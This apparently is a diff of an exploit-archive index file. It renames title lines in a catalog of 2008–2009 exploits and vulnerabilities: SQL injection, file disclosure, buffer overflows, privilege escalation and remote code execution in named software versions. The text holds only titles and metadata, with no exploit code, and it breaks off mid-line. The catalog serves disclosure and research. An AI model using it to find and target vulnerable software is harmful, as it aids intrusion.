@@ -6437,7 +6437,7 @@ id,file,description,date,author,platform,type,port 6872,platforms/windows/remote/6872.html,"MW6 DataMatrix - ActiveX (DataMatrix.dll) Insecure Method Exploit",2008-10-29,DeltahackingTEAM,windows,remote,0 6873,platforms/windows/remote/6873.html,"MW6 PDF417 - ActiveX (MW6PDF417.dll) Remote Insecure Method Exploit",2008-10-29,DeltahackingTEAM,windows,remote,0 6874,platforms/php/webapps/6874.txt,"Harlandscripts Pro Traffic One (mypage.php) SQL Injection Vulnerability",2008-10-29,"Beenu Arora",php,webapps,0 -6875,platforms/windows/remote/6875.html,"Visagesoft eXPert PDF ViewerX (VSPDFViewerX.ocx) File Overwrite",2008-10-29,"Marco Torti",windows,remote,0 +6875,platforms/windows/remote/6875.html,"Visagesoft eXPert PDF ViewerX - (VSPDFViewerX.ocx) File Overwrite",2008-10-29,"Marco Torti",windows,remote,0 6876,platforms/php/webapps/6876.txt,"Venalsur on-line Booking Centre (OfertaID) XSS/SQL Injection Vulns",2008-10-29,d3b4g,php,webapps,0 6877,platforms/php/webapps/6877.txt,"Pro Traffic One (poll_results.php id) Remote SQL Injection Vulnerability",2008-10-29,"Hussin X",php,webapps,0 6878,platforms/windows/remote/6878.html,"DjVu ActiveX Control 3.0 ImageURL Property Overflow Exploit",2008-10-30,"Shahriyar Jalayeri",windows,remote,0 @@ -6531,7 +6531,7 @@ id,file,description,date,author,platform,type,port 6968,platforms/php/webapps/6968.txt,"Acc Autos 4.0 Insecure Cookie Handling Vulnerability",2008-11-03,x0r,php,webapps,0 6969,platforms/php/webapps/6969.txt,"Apoll 0.7b (SQL Injection) Remote Auth Bypass Vulnerability",2008-11-03,ZoRLu,php,webapps,0 6971,platforms/php/webapps/6971.txt,"MatPo Link 1.2b (Blind SQL Injection/XSS) Multiple Vulnerabilities",2008-11-03,Hakxer,php,webapps,0 -6972,platforms/php/webapps/6972.txt,"pppBlog <= 0.3.11 (randompic.php) File Disclosure Vulnerability",2008-11-03,JosS,php,webapps,0 +6972,platforms/php/webapps/6972.txt,"pppBlog <= 0.3.11 - (randompic.php) File Disclosure Vulnerability",2008-11-03,JosS,php,webapps,0 6973,platforms/php/webapps/6973.txt,"TBmnetCMS 1.0 (index.php content) Local File Inclusion Vulnerability",2008-11-04,d3v1l,php,webapps,0 6974,platforms/php/webapps/6974.txt,"WEBBDOMAIN WebShop 1.02 (SQL/XSS) Multiple Vulnerabilities",2008-11-04,G4N0K,php,webapps,0 6975,platforms/php/webapps/6975.txt,"Joomla Component VirtueMart Google Base 1.1 RFI Vulnerability",2008-11-04,NoGe,php,webapps,0 @@ -6571,7 +6571,7 @@ id,file,description,date,author,platform,type,port 7009,platforms/php/webapps/7009.txt,"Mole Group Airline Ticket Script SQL Injection Vulnerability",2008-11-05,InjEctOr5,php,webapps,0 7010,platforms/php/webapps/7010.txt,"Mole Group Taxi Calc Dist Script (Auth Bypass) SQL Injection Vuln",2008-11-05,InjEctOr5,php,webapps,0 7011,platforms/php/webapps/7011.pl,"Simple Machines Forum <= 1.1.6 - (LFI) Code Execution Exploit",2008-11-05,~elmysterio,php,webapps,0 -7012,platforms/php/webapps/7012.txt,"hMAilServer 4.4.2 (PHPWebAdmin) File Inclusion Vulnerabilities",2008-11-06,Nine:Situations:Group,php,webapps,0 +7012,platforms/php/webapps/7012.txt,"hMAilServer 4.4.2 - (PHPWebAdmin) File Inclusion Vulnerabilities",2008-11-06,Nine:Situations:Group,php,webapps,0 7013,platforms/php/webapps/7013.txt,"DevelopItEasy Events Calendar 1.2 - Multiple SQL Injection Vulnerabilities",2008-11-06,InjEctOr5,php,webapps,0 7014,platforms/php/webapps/7014.txt,"DevelopItEasy News And Article System 1.4 - SQL Injection Vulns",2008-11-06,InjEctOr5,php,webapps,0 7015,platforms/php/webapps/7015.txt,"DevelopItEasy Membership System 1.3 (Auth Bypass) SQL Injection",2008-11-06,InjEctOr5,php,webapps,0 @@ -6611,7 +6611,7 @@ id,file,description,date,author,platform,type,port 7051,platforms/windows/local/7051.pl,"VLC Media Player < 0.9.6 - (.rt) Stack Buffer Overflow Exploit",2008-11-07,SkD,windows,local,0 7052,platforms/php/webapps/7052.txt,"Domain Seller Pro 1.5 (id) Remote SQL Injection Vulnerability",2008-11-07,TR-ShaRk,php,webapps,0 7053,platforms/php/webapps/7053.txt,"Myiosoft EasyBookMarker 4 - (Parent) SQL Injection Vulnerability",2008-11-07,G4N0K,php,webapps,0 -7054,platforms/windows/local/7054.txt,"Anti-Keylogger Elite 3.3.0 (AKEProtect.sys) Privilege Escalation Exploit",2008-11-07,"NT Internals",windows,local,0 +7054,platforms/windows/local/7054.txt,"Anti-Keylogger Elite 3.3.0 - (AKEProtect.sys) Privilege Escalation Exploit",2008-11-07,"NT Internals",windows,local,0 7055,platforms/hardware/remote/7055.txt,"SpeedStream 5200 - Authentication Bypass Config Download Vulnerability",2008-11-07,hkm,hardware,remote,0 7056,platforms/windows/remote/7056.rb,"GE Proficy Real Time Information Portal Credentials Leak Sniffer (meta)",2008-11-08,"Kevin Finisterre",windows,remote,0 7057,platforms/php/webapps/7057.pl,"MemHT Portal <= 4.0 - Remote Code Execution Exploit",2008-11-08,Ams,php,webapps,0 @@ -6727,7 +6727,7 @@ id,file,description,date,author,platform,type,port 7175,platforms/php/webapps/7175.txt,"Natterchat 1.12 (Auth Bypass) Remote SQL Injection Vulnerability",2008-11-20,Stack,php,webapps,0 7176,platforms/php/webapps/7176.txt,"ToursManager (tourview.php tourid) Blind SQL Injection Vulnerability",2008-11-20,XaDoS,php,webapps,0 7177,platforms/linux/local/7177.c,"Oracle Database Vault ptrace(2) Privilege Escalation Exploit",2008-11-20,"Jakub Wartak",linux,local,0 -7178,platforms/windows/dos/7178.txt,"BitDefender (module pdf.xmd) Infinite Loop Denial of Service PoC",2008-11-20,ProTeuS,windows,dos,0 +7178,platforms/windows/dos/7178.txt,"BitDefender - (module pdf.xmd) Infinite Loop Denial of Service PoC",2008-11-20,ProTeuS,windows,dos,0 7179,platforms/php/webapps/7179.txt,"NatterChat 1.1 - Remote Admin Bypass Vulnerability",2008-11-20,Stack,php,webapps,0 7180,platforms/php/webapps/7180.txt,"VCalendar (VCalendar.mdb) Remote Database Disclosure Vulnerability",2008-11-20,Swan,php,webapps,0 7181,platforms/windows/remote/7181.html,"KVIrc 3.4.2 Shiny (uri handler) Remote Command Execution Exploit",2008-11-21,Nine:Situations:Group,windows,remote,0 @@ -6777,7 +6777,7 @@ id,file,description,date,author,platform,type,port 7230,platforms/php/webapps/7230.pl,"Clean CMS 1.5 (full_txt.php id) Blind SQL Injection Exploit",2008-11-25,JosS,php,webapps,0 7231,platforms/php/webapps/7231.txt,"fuzzylime CMS 3.03 (track.php p) Local File Inclusion Vulnerability",2008-11-25,"Alfons Luja",php,webapps,0 7232,platforms/php/webapps/7232.txt,"SimpleBlog 3.0 (simpleBlog.mdb) Database Disclosure Vulnerability",2008-11-25,EL_MuHaMMeD,php,webapps,0 -7233,platforms/php/webapps/7233.txt,"LoveCMS 1.6.2 Final (Download Manager 1.0) File Upload Exploit",2008-11-25,cOndemned,php,webapps,0 +7233,platforms/php/webapps/7233.txt,"LoveCMS 1.6.2 Final (Download Manager 1.0) - File Upload Exploit",2008-11-25,cOndemned,php,webapps,0 7234,platforms/php/webapps/7234.txt,"VideoGirls BiZ (view_snaps.php type) Blind SQL Injection Vulnerability",2008-11-25,Cyber-Zone,php,webapps,0 7235,platforms/php/webapps/7235.txt,"Jamit Job Board 3.x - (show_emp) Blind SQL Injection Vulnerability",2008-11-25,XaDoS,php,webapps,0 7236,platforms/php/webapps/7236.txt,"WebStudio CMS - (pageid) Remote Blind SQL Injection Vulnerability (mil mixup)",2008-11-26,"BorN To K!LL",php,webapps,0 @@ -6961,7 +6961,7 @@ id,file,description,date,author,platform,type,port 7418,platforms/php/webapps/7418.txt,"PhpAddEdit 1.3 (Cookie) Login Bypass Vulnerability",2008-12-11,x0r,php,webapps,0 7419,platforms/asp/webapps/7419.txt,"evCal Events Calendar Database Disclosure Vulnerability",2008-12-11,Cyber-Zone,asp,webapps,0 7420,platforms/asp/webapps/7420.txt,"MyCal Personal Events Calendar (mycal.mdb) Database Disclosure Vuln",2008-12-11,CoBRa_21,asp,webapps,0 -7421,platforms/php/webapps/7421.txt,"eZ Publish 3.9.0/3.9.5/3.10.1 Command Execution Exploit (admin req)",2008-12-11,s4avrd0w,php,webapps,0 +7421,platforms/php/webapps/7421.txt,"eZ Publish 3.9.0/3.9.5/3.10.1 - Command Execution Exploit (admin req)",2008-12-11,s4avrd0w,php,webapps,0 7422,platforms/php/webapps/7422.txt,"Feed CMS 1.07.03.19b (lang) Local File Inclusion Vulnerability",2008-12-11,x0r,php,webapps,0 7423,platforms/asp/webapps/7423.txt,"Affiliate Software Java 4.0 (Auth Bypass) SQL Injection Vulnerability",2008-12-11,R3d-D3V!L,asp,webapps,0 7424,platforms/asp/webapps/7424.txt,"Ad Management Java (Auth Bypass) SQL Injection Vulnerability",2008-12-11,R3d-D3V!L,asp,webapps,0 @@ -7055,7 +7055,7 @@ id,file,description,date,author,platform,type,port 7513,platforms/php/webapps/7513.txt,"Calendar Script 1.1 Insecure Cookie Handling Vulnerability",2008-12-18,Osirys,php,webapps,0 7514,platforms/php/webapps/7514.txt,"I-Rater Basic (messages.php) Remote SQL Injection Vulnerability",2008-12-18,boom3rang,php,webapps,0 7515,platforms/php/webapps/7515.txt,"phpclanwebsite <= 1.23.3 fix pack #5 - Multiple Vulnerabilities",2008-12-18,s4avrd0w,php,webapps,0 -7516,platforms/windows/local/7516.txt,"ESET Smart Security <= 3.0.672 (epfw.sys) Privilege Escalation Exploit",2008-12-18,"NT Internals",windows,local,0 +7516,platforms/windows/local/7516.txt,"ESET Smart Security <= 3.0.672 - (epfw.sys) Privilege Escalation Exploit",2008-12-18,"NT Internals",windows,local,0 7517,platforms/php/webapps/7517.txt,"Injader CMS 2.1.1 (id) Remote SQL Injection Vulnerability",2008-12-18,fuzion,php,webapps,0 7518,platforms/php/webapps/7518.txt,"Gobbl CMS 1.0 Insecure Cookie Handling Vulnerability",2008-12-18,x0r,php,webapps,0 7519,platforms/php/webapps/7519.txt,"MyPHPsite (index.php mod) Local File Inclusion Vulnerability",2008-12-18,Piker,php,webapps,0 @@ -7064,7 +7064,7 @@ id,file,description,date,author,platform,type,port 7522,platforms/php/webapps/7522.pl,"MyPBS (index.php seasonID) Remote SQL Injection Exploit",2008-12-19,Piker,php,webapps,0 7523,platforms/php/webapps/7523.php,"ReVou Twitter Clone Admin Password Changing Exploit",2008-12-19,G4N0K,php,webapps,0 7524,platforms/php/webapps/7524.txt,"Online Keyword Research Tool (download.php) File Disclosure Vuln",2008-12-19,"Cold Zero",php,webapps,0 -7525,platforms/php/webapps/7525.txt,"Extract Website (download.php filename) File Disclosure Vulnerability",2008-12-19,"Cold Zero",php,webapps,0 +7525,platforms/php/webapps/7525.txt,"Extract Website - (download.php filename) File Disclosure Vulnerability",2008-12-19,"Cold Zero",php,webapps,0 7526,platforms/php/webapps/7526.txt,"myPHPscripts Login Session 2.0 - XSS/Database Disclosure Vulns",2008-12-19,Osirys,php,webapps,0 7527,platforms/php/webapps/7527.txt,"FreeLyrics 1.0 (source.php p) Remote File Disclosure Vulnerability",2008-12-19,Piker,php,webapps,0 7528,platforms/php/webapps/7528.pl,"OneOrZero helpdesk 1.6.x. - Remote Shell Upload Exploit",2008-12-19,Ams,php,webapps,0 @@ -7072,7 +7072,7 @@ id,file,description,date,author,platform,type,port 7530,platforms/php/webapps/7530.pl,"Userlocator 3.0 (y) Remote Blind SQL Injection Exploit",2008-12-21,katharsis,php,webapps,0 7531,platforms/php/webapps/7531.txt,"ReVou Twitter Clone Arbitrary File Upload Vulnerability",2008-12-21,S.W.A.T.,php,webapps,0 7532,platforms/php/webapps/7532.txt,"chicomas <= 2.0.4 (DB Backup/DD/XSS) Multiple Vulnerabilities",2008-12-21,BugReport.IR,php,webapps,0 -7533,platforms/windows/local/7533.txt,"PowerStrip < = 3.84 (pstrip.sys) Privilege Escalation Exploit",2008-12-21,"NT Internals",windows,local,0 +7533,platforms/windows/local/7533.txt,"PowerStrip < = 3.84 = (pstrip.sys) Privilege Escalation Exploit",2008-12-21,"NT Internals",windows,local,0 7534,platforms/asp/webapps/7534.txt,"Emefa Guestbook 3.0 - Remote Database Disclosure Vulnerability",2008-12-21,Cyber.Zer0,asp,webapps,0 7535,platforms/hardware/dos/7535.php,"Linksys Wireless ADSL Router (WAG54G v2) - httpd DoS Exploit",2008-12-21,r0ut3r,hardware,dos,0 7536,platforms/windows/local/7536.cpp,"CoolPlayer 2.19 - (Skin File) Local Buffer Overflow Exploit",2008-12-21,r0ut3r,windows,local,0 @@ -7081,7 +7081,7 @@ id,file,description,date,author,platform,type,port 7539,platforms/php/webapps/7539.txt,"Joomla Component com_tophotelmodule 1.0 - Blind SQL Injection Vuln",2008-12-21,boom3rang,php,webapps,0 7540,platforms/php/webapps/7540.txt,"phpg 1.6 (xss/pd/dos) Multiple Vulnerabilities",2008-12-21,"Anarchy Angel",php,webapps,0 7541,platforms/php/webapps/7541.pl,"RSS Simple News (news.php pid) Remote SQL Injection Exploit",2008-12-22,Piker,php,webapps,0 -7542,platforms/php/webapps/7542.txt,"Text Lines Rearrange Script (filename) File Disclosure Vulnerability",2008-12-22,SirGod,php,webapps,0 +7542,platforms/php/webapps/7542.txt,"Text Lines Rearrange Script - (filename) File Disclosure Vulnerability",2008-12-22,SirGod,php,webapps,0 7543,platforms/php/webapps/7543.txt,"Wordpress Plugin Page Flip Image Gallery <= 0.2.2 - Remote FD Vuln",2008-12-22,GoLd_M,php,webapps,0 7544,platforms/php/webapps/7544.txt,"Pligg 9.9.5b (check_url.php url) Upload Shell/SQL Injection Exploit",2008-12-22,Ams,php,webapps,0 7545,platforms/php/webapps/7545.txt,"yourplace <= 1.0.2 - Multiple Vulnerabilities + rce Exploit",2008-12-22,Osirys,php,webapps,0 @@ -7539,7 +7539,7 @@ id,file,description,date,author,platform,type,port 8010,platforms/windows/local/8010.pl,"FeedDemon <= 2.7 OPML Outline Tag Buffer Overflow Exploit",2009-02-09,cenjan,windows,local,0 8011,platforms/php/webapps/8011.txt,"BusinessSpace <= 1.2 (id) Remote SQL Injection Vulnerability",2009-02-09,K-159,php,webapps,0 8012,platforms/php/webapps/8012.txt,"A Better Member-Based ASP Photo Gallery (entry) SQL Injection Vuln",2009-02-09,BackDoor,php,webapps,0 -8013,platforms/hardware/dos/8013.txt,"Nokia N95-8 (JPG File) Remote Crash PoC",2009-02-09,"Juan Yacubian",hardware,dos,0 +8013,platforms/hardware/dos/8013.txt,"Nokia N95-8 - (.JPG File) Remote Crash PoC",2009-02-09,"Juan Yacubian",hardware,dos,0 8014,platforms/php/webapps/8014.pl,"PHP Director <= 0.21 - Remote Command Execution Exploit",2009-02-09,darkjoker,php,webapps,0 8015,platforms/php/webapps/8015.pl,"Hedgehog-CMS <= 1.21 - Remote Command Execution Exploit",2009-02-09,darkjoker,php,webapps,0 8016,platforms/php/webapps/8016.txt,"adaptcms lite 1.4 (xss/rfi) Multiple Vulnerabilities",2009-02-09,RoMaNcYxHaCkEr,php,webapps,0 @@ -7608,9 +7608,9 @@ id,file,description,date,author,platform,type,port 8082,platforms/windows/remote/8082.html,"Microsoft Internet Explorer 7 - Memory Corruption PoC (MS09-002) (win2k3sp2)",2009-02-20,webDEViL,windows,remote,0 8083,platforms/php/webapps/8083.txt,"phpBB 3 (autopost bot mod <= 0.1.3) Remote File Include Vulnerability",2009-02-20,Kacper,php,webapps,0 8084,platforms/windows/dos/8084.pl,"Got All Media 7.0.0.3 (t00t) Remote Denial of Service Exploit",2009-02-20,LiquidWorm,windows,dos,0 -8085,platforms/cgi/webapps/8085.txt,"i-dreams Mailer 1.2 Final (admin.dat) File Disclosure Vulnerability",2009-02-20,Pouya_Server,cgi,webapps,0 -8086,platforms/cgi/webapps/8086.txt,"i-dreams GB 5.4 Final (admin.dat) File Disclosure Vulnerability",2009-02-20,Pouya_Server,cgi,webapps,0 -8087,platforms/cgi/webapps/8087.txt,"i-dreams GB Server (admin.dat) File Disclosure Vulnerability",2009-02-20,Pouya_Server,cgi,webapps,0 +8085,platforms/cgi/webapps/8085.txt,"i-dreams Mailer 1.2 Final - (admin.dat) File Disclosure Vulnerability",2009-02-20,Pouya_Server,cgi,webapps,0 +8086,platforms/cgi/webapps/8086.txt,"i-dreams GB 5.4 Final - (admin.dat) File Disclosure Vulnerability",2009-02-20,Pouya_Server,cgi,webapps,0 +8087,platforms/cgi/webapps/8087.txt,"i-dreams GB Server - (admin.dat) File Disclosure Vulnerability",2009-02-20,Pouya_Server,cgi,webapps,0 8088,platforms/php/webapps/8088.txt,"Osmodia Bulletin Board 1.x - (admin.txt) File Disclosure Vulnerability",2009-02-20,Pouya_Server,php,webapps,0 8089,platforms/php/webapps/8089.pl,"Graugon Forum 1 - (id) SQL Command Injection Exploit",2009-02-20,Osirys,php,webapps,0 8090,platforms/windows/dos/8090.txt,"Multiple PDF Readers - JBIG2 - Local Buffer Overflow PoC",2009-02-23,webDEViL,windows,dos,0 @@ -7688,9 +7688,9 @@ id,file,description,date,author,platform,type,port 8170,platforms/php/webapps/8170.txt,"nForum 1.5 - Multiple Remote SQL Injection Vulnerabilities",2009-03-09,"Salvatore Fresta",php,webapps,0 8171,platforms/windows/local/8171.py,"Nokia Multimedia Player 1.0 (playlist) Universal SEH Overwrite Exploit",2009-03-09,His0k4,windows,local,0 8172,platforms/php/webapps/8172.txt,"cms s.builder <= 3.7 - Remote File Inclusion Vulnerability",2009-03-09,cr0w,php,webapps,0 -8173,platforms/windows/remote/8173.txt,"Belkin BullDog Plus UPS-Service Buffer Overflow Exploit",2009-03-09,Elazar,windows,remote,0 +8173,platforms/windows/remote/8173.txt,"Belkin BullDog Plus UPS-Service - Buffer Overflow Exploit",2009-03-09,Elazar,windows,remote,0 8174,platforms/windows/local/8174.py,"Realtek Sound Manager 1.15.0.0 PlayList SEH Overwrite Exploit",2009-03-09,His0k4,windows,local,0 -8175,platforms/windows/local/8175.txt,"mks_vir 9b < 1.2.0.0b297 (mksmonen.sys) Privilege Escalation Exploit",2009-03-09,"NT Internals",windows,local,0 +8175,platforms/windows/local/8175.txt,"mks_vir 9b < 1.2.0.0b297 - (mksmonen.sys) Privilege Escalation Exploit",2009-03-09,"NT Internals",windows,local,0 8176,platforms/windows/local/8176.py,"EO Video 1.36 - PlayList SEH Overwrite Exploit",2009-03-09,His0k4,windows,local,0 8177,platforms/windows/local/8177.py,"RadASM 2.2.1.5 - (.RAP) Local Stack Overflow Exploit",2009-03-09,zAx,windows,local,0 8178,platforms/windows/local/8178.pl,"MediaCoder 0.6.2.4275 (m3u File) Universal Stack Overflow Exploit",2009-03-09,Stack,windows,local,0 @@ -7759,7 +7759,7 @@ id,file,description,date,author,platform,type,port 8247,platforms/cgi/webapps/8247.txt,"Hannon Hill Cascade Server Command Execution Vulnerability (post auth)",2009-03-19,"Emory University",cgi,webapps,0 8248,platforms/windows/remote/8248.py,"POP Peeper 3.4.0.0 (From) Remote Buffer Overflow Exploit (SEH)",2009-03-20,His0k4,windows,remote,0 8249,platforms/windows/local/8249.php,"BS.Player <= 2.34 Build 980 - (.bsl) Local Buffer Overflow Exploit (SEH)",2009-03-20,Nine:Situations:Group,windows,local,0 -8250,platforms/windows/local/8250.txt,"CloneCD/DVD (ElbyCDIO.sys < 6.0.3.2) Local Privilege Escalation Exploit",2009-03-20,"NT Internals",windows,local,0 +8250,platforms/windows/local/8250.txt,"CloneCD/DVD ElbyCDIO.sys < 6.0.3.2 - Local Privilege Escalation Exploit",2009-03-20,"NT Internals",windows,local,0 8251,platforms/windows/local/8251.py,"BS.Player 2.34 - (.bsl) Universal SEH Overwrite Exploit",2009-03-20,His0k4,windows,local,0 8252,platforms/php/webapps/8252.txt,"pixie CMS (xss/SQL) Multiple Vulnerabilities",2009-03-20,"Justin Keane",php,webapps,0 8253,platforms/windows/remote/8253.c,"Racer 0.5.3b5 - Remote Stack Buffer Overflow Exploit",2009-03-20,"fl0 fl0w",windows,remote,0 @@ -7778,7 +7778,7 @@ id,file,description,date,author,platform,type,port 8266,platforms/osx/local/8266.txt,"Mac OS X xnu <= 1228.x (hfs-fcntl) Local Kernel Root Exploit",2009-03-23,mu-b,osx,local,0 8267,platforms/windows/local/8267.py,"Zinf Audio Player 2.2.1 - (.pls) Universal Seh Overwrite Exploit",2009-03-23,His0k4,windows,local,0 8268,platforms/php/webapps/8268.php,"PHPizabi 0.848b C1 HFP1-3 - Remote Command Execution Exploit",2009-03-23,YOUCODE,php,webapps,0 -8269,platforms/hardware/remote/8269.txt,"Rittal CMC-TC Processing Unit II Multiple Vulnerabilities",2009-03-23,"Louhi Networks",hardware,remote,0 +8269,platforms/hardware/remote/8269.txt,"Rittal CMC-TC Processing Unit II - Multiple Vulnerabilities",2009-03-23,"Louhi Networks",hardware,remote,0 8270,platforms/windows/local/8270.pl,"eXeScope 6.50 - Local Buffer Overflow Exploit",2009-03-23,Koshi,windows,local,0 8271,platforms/php/webapps/8271.php,"Pluck CMS 4.6.1 (module_pages_site.php post) LFI Exploit",2009-03-23,"Alfons Luja",php,webapps,0 8272,platforms/php/webapps/8272.pl,"Codice CMS 2 - Remote SQL Command Execution Exploit",2009-03-23,darkjoker,php,webapps,0 @@ -7790,7 +7790,7 @@ id,file,description,date,author,platform,type,port 8278,platforms/php/webapps/8278.txt,"Jinzora Media Jukebox <= 2.8 (name) Local File Inclusion Vulnerability",2009-03-24,dun,php,webapps,0 8279,platforms/php/webapps/8279.txt,"PHPizabi 0.848b - C1 HFP1 - Remote Privilege Escalation Vulnerability",2009-03-24,Nine:Situations:Group,php,webapps,0 8280,platforms/windows/local/8280.txt,"Adobe Acrobat Reader - JBIG2 Universal Exploit (Bind Shell Port 5500)",2009-03-24,"Black Security",windows,local,0 -8281,platforms/windows/dos/8281.txt,"Microsoft GdiPlus EMF GpFont.SetData Integer Overflow PoC",2009-03-24,"Black Security",windows,dos,0 +8281,platforms/windows/dos/8281.txt,"Microsoft GdiPlus - EMF GpFont.SetData Integer Overflow PoC",2009-03-24,"Black Security",windows,dos,0 8282,platforms/php/webapps/8282.txt,"SurfMyTV Script 1.0 (view.php id) SQL Injection Vulnerability",2009-03-24,x0r,php,webapps,0 8283,platforms/windows/remote/8283.c,"Femitter FTP Server 1.x - Multiple Vulnerabilities (post auth)",2009-03-24,"Jonathan Salwan",windows,remote,0 8284,platforms/windows/remote/8284.pl,"IncrediMail 5.86 (XSS) Script Execution Exploit",2009-03-24,"Bui Quang Minh",windows,remote,0 @@ -7830,7 +7830,7 @@ id,file,description,date,author,platform,type,port 8319,platforms/php/webapps/8319.txt,"family connection 1.8.1 - Multiple Vulnerabilities",2009-03-30,"Salvatore Fresta",php,webapps,0 8320,platforms/multiple/dos/8320.py,"Opera 9.64 (7400 nested elements) XML Parsing Remote Crash Exploit",2009-03-30,"Ahmed Obied",multiple,dos,0 8321,platforms/windows/remote/8321.py,"Amaya 11.1 W3C Editor/Browser (defer) Stack Overflow Exploit",2009-03-30,"Encrypt3d.M!nd ",windows,remote,0 -8322,platforms/windows/local/8322.txt,"Trend Micro Internet Security Pro 2009 Priviliege Escalation PoC",2009-03-30,b1@ckeYe,windows,local,0 +8322,platforms/windows/local/8322.txt,"Trend Micro Internet Security Pro 2009 - Priviliege Escalation PoC",2009-03-30,b1@ckeYe,windows,local,0 8323,platforms/php/webapps/8323.txt,"Community CMS 0.5 - Multiple SQL Injection Vulnerabilities",2009-03-31,"Salvatore Fresta",php,webapps,0 8324,platforms/php/webapps/8324.php,"Podcast Generator <= 1.1 - Remote Code Execution Exploit",2009-03-31,BlackHawk,php,webapps,0 8325,platforms/windows/dos/8325.py,"Safari 3.2.2/4b (nested elements) XML Parsing Remote Crash Exploit",2009-03-31,"Ahmed Obied",windows,dos,0 @@ -7940,13 +7940,13 @@ id,file,description,date,author,platform,type,port 8432,platforms/php/webapps/8432.txt,"Aqua CMS (username) SQL Injection Vulnerability",2009-04-14,halkfild,php,webapps,0 8433,platforms/php/webapps/8433.txt,"RQms (Rash) <= 1.2.2 - Multiple SQL Injection Vulnerabilities",2009-04-14,Dimi4,php,webapps,0 8434,platforms/windows/dos/8434.html,"PowerCHM 5.7 (Long URL) Local Stack Overflow PoC",2009-04-14,SuB-ZeRo,windows,dos,0 -8435,platforms/php/webapps/8435.txt,"W2B phpEmployment (conf.inc) File Disclosure VUlnerability",2009-04-14,InjEctOr5,php,webapps,0 +8435,platforms/php/webapps/8435.txt,"W2B phpEmployment - (conf.inc) File Disclosure VUlnerability",2009-04-14,InjEctOr5,php,webapps,0 8436,platforms/php/webapps/8436.txt,"Job2C 4.2 (profile) Remote Shell Upload Vulnerability",2009-04-15,InjEctOr5,php,webapps,0 8437,platforms/php/webapps/8437.txt,"phpAdBoard (conf.inc) Remote Config File Disclosure Vulnerability",2009-04-15,InjEctOr5,php,webapps,0 8438,platforms/php/webapps/8438.txt,"phpGreetCards (conf.inc) Config File Disclosure Vulnerability",2009-04-15,InjEctOr5,php,webapps,0 8439,platforms/php/webapps/8439.txt,"W2B Restaurant 1.2 (conf.inc) Config File Disclosure Vulnerability",2009-04-15,InjEctOr5,php,webapps,0 8440,platforms/php/webapps/8440.txt,"phpAdBoardPro (config.inc) Config File Disclosure Vulnerability",2009-04-15,InjEctOr5,php,webapps,0 -8441,platforms/php/webapps/8441.txt,"phpDatingClub (conf.inc) File Disclosure Vulnerability",2009-04-15,InjEctOr5,php,webapps,0 +8441,platforms/php/webapps/8441.txt,"phpDatingClub - (conf.inc) File Disclosure Vulnerability",2009-04-15,InjEctOr5,php,webapps,0 8442,platforms/php/webapps/8442.txt,"Job2C (conf.inc) Config File Disclosure Vulnerability",2009-04-15,InjEctOr5,php,webapps,0 8443,platforms/php/webapps/8443.txt,"Job2C 4.2 (adtype) Local File Inclusion Vulnerability",2009-04-15,ZoRLu,php,webapps,0 8444,platforms/windows/local/8444.cpp,"Star Downloader Free <= 1.45 - (.dat) Universal SEH Overwrite Exploit",2009-04-15,dun,windows,local,0 @@ -8202,10 +8202,10 @@ id,file,description,date,author,platform,type,port 8697,platforms/php/webapps/8697.txt,"Joomla Component ArtForms 2.1 b7 - Remote File Inclusion Vulnerabilities",2009-05-15,iskorpitx,php,webapps,0 8698,platforms/windows/local/8698.pl,"Audioactive Player 1.93b (.m3u) Local Buffer Overflow Exploit",2009-05-15,hack4love,windows,local,0 8699,platforms/php/webapps/8699.php,"Harland Scripts 11 Products Remote Command Execution Exploit",2009-05-15,G4N0K,php,webapps,0 -8700,platforms/php/webapps/8700.txt,"Rama CMS <= 0.9.8 (download.php file) File Disclosure Vulnerability",2009-05-15,Br0ly,php,webapps,0 +8700,platforms/php/webapps/8700.txt,"Rama CMS <= 0.9.8 - (download.php file) File Disclosure Vulnerability",2009-05-15,Br0ly,php,webapps,0 8701,platforms/windows/local/8701.py,"Audioactive Player 1.93b (.m3u) Local Buffer Overflow Exploit (SEH)",2009-05-15,His0k4,windows,local,0 8702,platforms/php/webapps/8702.txt,"2daybiz Custom T-shirt Design (SQL/XSS) Multiple Remote Vulns",2009-05-15,snakespc,php,webapps,0 -8704,platforms/windows/remote/8704.txt,"Microsoft IIS 6.0 WebDAV Remote Authentication Bypass Vulnerability",2009-05-15,kingcope,windows,remote,0 +8704,platforms/windows/remote/8704.txt,"Microsoft IIS 6.0 WebDAV - Remote Authentication Bypass Vulnerability",2009-05-15,kingcope,windows,remote,0 8705,platforms/asp/webapps/8705.txt,"DMXReady Registration Manager 1.1 Database Disclosure Vulnerability",2009-05-15,S4S-T3rr0r!sT,asp,webapps,0 8706,platforms/php/webapps/8706.pl,"PHPenpals <= 1.1 (mail.php ID) Remote SQL Injection Exploit",2009-05-15,Br0ly,php,webapps,0 8707,platforms/php/webapps/8707.txt,"my-colex 1.4.2 (ab/xss/SQL) Multiple Vulnerabilities",2009-05-15,YEnH4ckEr,php,webapps,0 @@ -8279,7 +8279,7 @@ id,file,description,date,author,platform,type,port 8779,platforms/php/webapps/8779.txt,"Joomla Boy Scout Advancement 0.3 (id) SQL Injection Exploit",2009-05-26,YEnH4ckEr,php,webapps,0 8780,platforms/windows/local/8780.php,"COWON America jetCast 2.0.4.1109 - (.mp3) Local Overflow Exploit",2009-05-26,Nine:Situations:Group,windows,local,0 8781,platforms/php/webapps/8781.txt,"Dokuwiki 2009-02-14 - Local File Inclusion Vulnerability",2009-05-26,girex,php,webapps,0 -8782,platforms/windows/local/8782.txt,"ArcaVir 2009 < 9.4.320X.9 (ps_drv.sys) Local Privilege Escalation Exploit",2009-05-26,"NT Internals",windows,local,0 +8782,platforms/windows/local/8782.txt,"ArcaVir 2009 < 9.4.320X.9 - (ps_drv.sys) Local Privilege Escalation Exploit",2009-05-26,"NT Internals",windows,local,0 8783,platforms/windows/local/8783.c,"Winamp 5.551 MAKI Parsing Integer Overflow Exploit",2009-05-26,n00b,windows,local,0 8784,platforms/php/webapps/8784.txt,"vBulletin vbBux/vbPlaza <= 2.x - (vbplaza.php) Blind SQL Injection Vuln",2009-05-26,"Cold Zero",php,webapps,0 8785,platforms/asp/webapps/8785.txt,"Cute Editor ASP.NET Remote File Disclosure Vulnerability",2009-05-26,Securitylab.ir,asp,webapps,0 @@ -8370,7 +8370,7 @@ id,file,description,date,author,platform,type,port 8872,platforms/php/webapps/8872.txt,"Joomla Component com_mosres Multiple SQL Injection Vulnerabilities",2009-06-03,"Chip d3 bi0s",php,webapps,0 8873,platforms/multiple/dos/8873.c,"OpenSSL < 0.9.8i DTLS ChangeCipherSpec Remote DoS 